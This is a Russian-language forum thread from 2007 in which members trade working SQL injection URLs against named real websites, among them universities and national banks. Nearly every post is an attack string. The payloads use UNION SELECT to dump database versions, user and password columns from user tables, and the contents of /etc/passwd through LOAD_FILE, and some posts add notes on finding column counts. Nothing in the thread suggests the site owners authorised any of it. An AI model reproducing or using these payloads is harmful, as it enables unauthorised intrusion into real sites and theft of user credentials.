HOME FORUMS MEMBERS RECENT POSTS LOG IN  
× Авторизация
Имя пользователя:
Пароль:
Нет аккаунта? Регистрация
Баннер 1   Баннер 2

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
Вернуться   Форум АНТИЧАТ > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #1  
Старый 20.03.2007, 17:17
Colkru
Участник форума
Регистрация: 13.01.2007
Сообщений: 160
Провел на форуме:
865816

Репутация: 181
По умолчанию

Я снова тут)))

Код:
http://www.ccrl.ca/index.php?id=-1+union+select+1,version(),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29/*
Код:
http://www.koienterprise.com/buyKoi.php?id=-1+union+select+1,2,3,4,5,version(),7,8,9,10/*
Код:
http://www.howdtheyvote.ca/member.php?id=-1+union+select+1,2,3,version(),5,6,7,8,9,10,11,12/*

Последний раз редактировалось Colkru; 20.03.2007 в 17:32..
 
Ответить с цитированием

  #2  
Старый 20.03.2007, 16:53
Spyder
Members of Antichat - Level 5
Регистрация: 09.10.2006
Сообщений: 1,698
Провел на форуме:
9098076

Репутация: 4303


По умолчанию

Цитата:
http://ctgweb.byuh.edu/P%20&%20S/p.php?id=-3+union+select+1,2,LOAD_FILE(0x2f6574632f706173737 764)
=\ не льёцо в /tmp, хотя может просто я глючу
 
Ответить с цитированием

  #3  
Старый 20.03.2007, 17:11
Ksander
Постоянный
Регистрация: 21.06.2006
Сообщений: 931
Провел на форуме:
4836047

Репутация: 930


По умолчанию

www.rs.ru

Русский Стандарт банк

Ни 1,2,3 ни null, не помогают, но через order+by их там 15-16 штук.

Код:
http://www.rs.ru/ru/index.php?id70=-1+order+by+16/*
 
Ответить с цитированием

  #4  
Старый 20.03.2007, 17:29
Ksander
Постоянный
Регистрация: 21.06.2006
Сообщений: 931
Провел на форуме:
4836047

Репутация: 930


По умолчанию

<noindex>www.nbt.tj

Национальный банк Таджикистана

Код:
http://www.nbt.tj/?c=5&id=-1+union+select+1,2,3,4,5,6,7,8,9/*
</noindex>
 
Ответить с цитированием

  #5  
Старый 20.03.2007, 17:38
kamaz
Познающий
Регистрация: 31.01.2007
Сообщений: 88
Провел на форуме:
631013

Репутация: 453
По умолчанию

Цитата:
http://www.sequentialtart.com/article.php?id=-344%20UNION%20SELECT%201,2,3,4,5,6,7,8,9,10,11,12, 13,14,15,16,17,18,19,20,21,22,23,24/*
Цитата:
http://www.phpbuddy.com/article.php?id=-7%20union%20select%201,2,3,4,5,6/*
Цитата:
http://www.karlcore.com/articles/article.php?id=-3%20union%20select%201,2,3,4,5,6/*
Цитата:
http://8e.devbio.com/article.php?id=-162%20union%20select%201,2,concat(username,char(58 ),password),4,5,6,7,8,9,0%20from%20users/*
Цитата:
http://www.fastcasual.com/article.php?id=-6708%20union%20select%201,concat(username,char(58) ,user_email,char(58),user_icq,char(58),user_passwo rd),3,4,5,6,user_id%20from%20phpbb_users%20limit%2 01,2/*
Цитата:
http://www.thesop.org/articles.php?type=-5%20union%20select%201,2,3,4,id,concat(username,ch ar(58),password),7,8,9,0,1,2,3,4%20from%20users/*
____
 
Ответить с цитированием

  #6  
Старый 20.03.2007, 17:41
*D1VER
Участник форума
Регистрация: 05.12.2006
Сообщений: 112
Провел на форуме:
685950

Репутация: 175
По умолчанию

http://provodka.ru/zakon.php?s=-1+union+select+user()/*


http://www.mosinform.ru/content.php?s=-1+union+select+1,2,3,444,5,6,7,8,9,10+from+news/*


http://www.stove.ru/index.php?lng=0&rs=-1+union+select+concat(table_name,0x3a,version()),2 ,3,4,5,6+from+information_schema.tables/*

Последний раз редактировалось *D1VER; 20.03.2007 в 18:07..
 
Ответить с цитированием

  #7  
Старый 20.03.2007, 18:11
Spyder
Members of Antichat - Level 5
Регистрация: 09.10.2006
Сообщений: 1,698
Провел на форуме:
9098076

Репутация: 4303


По умолчанию

Цитата:
http://german.berkeley.edu/newsevents/showevent.php?id=-26+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,1 5,16,17,18,19,20,21,22,23,24,25,26
при неправильном запросе вылетает алерт с описанием ошибки + перекидывает на страницу назад. Наркоманы =\
 
Ответить с цитированием

  #8  
Старый 20.03.2007, 18:43
Ksander
Постоянный
Регистрация: 21.06.2006
Сообщений: 931
Провел на форуме:
4836047

Репутация: 930


По умолчанию

www.stena.ru

Вывод в тайтле.
Код:
http://www.stena.ru/catalog.php?page=-1+union+select+1,concat(version(),char(58),user(),char(58),database()),3,4/*
 
Ответить с цитированием

  #9  
Старый 20.03.2007, 18:49
Spyder
Members of Antichat - Level 5
Регистрация: 09.10.2006
Сообщений: 1,698
Провел на форуме:
9098076

Репутация: 4303


По умолчанию

Цитата:
http://php.scripts.psu.edu/jsp17/index.php?action=cv&id=-1+union+select+1
SQLite
разбираться влом. Таблицы не подобрал, не очень то и старался
 
Ответить с цитированием

  #10  
Старый 20.03.2007, 19:43
Ksander
Постоянный
Регистрация: 21.06.2006
Сообщений: 931
Провел на форуме:
4836047

Репутация: 930


По умолчанию

privet.zp.ua

Код:
http://privet.zp.ua/part4.php3?catid=-1+union+select+version()/*
www.eatoutnewyork.com

Код:
http://www.eatoutnewyork.com/orgs/show.php?ID=-1+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16.../*
 
Ответить с цитированием
Ответ





Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT ™ © 2001- Antichat Kft.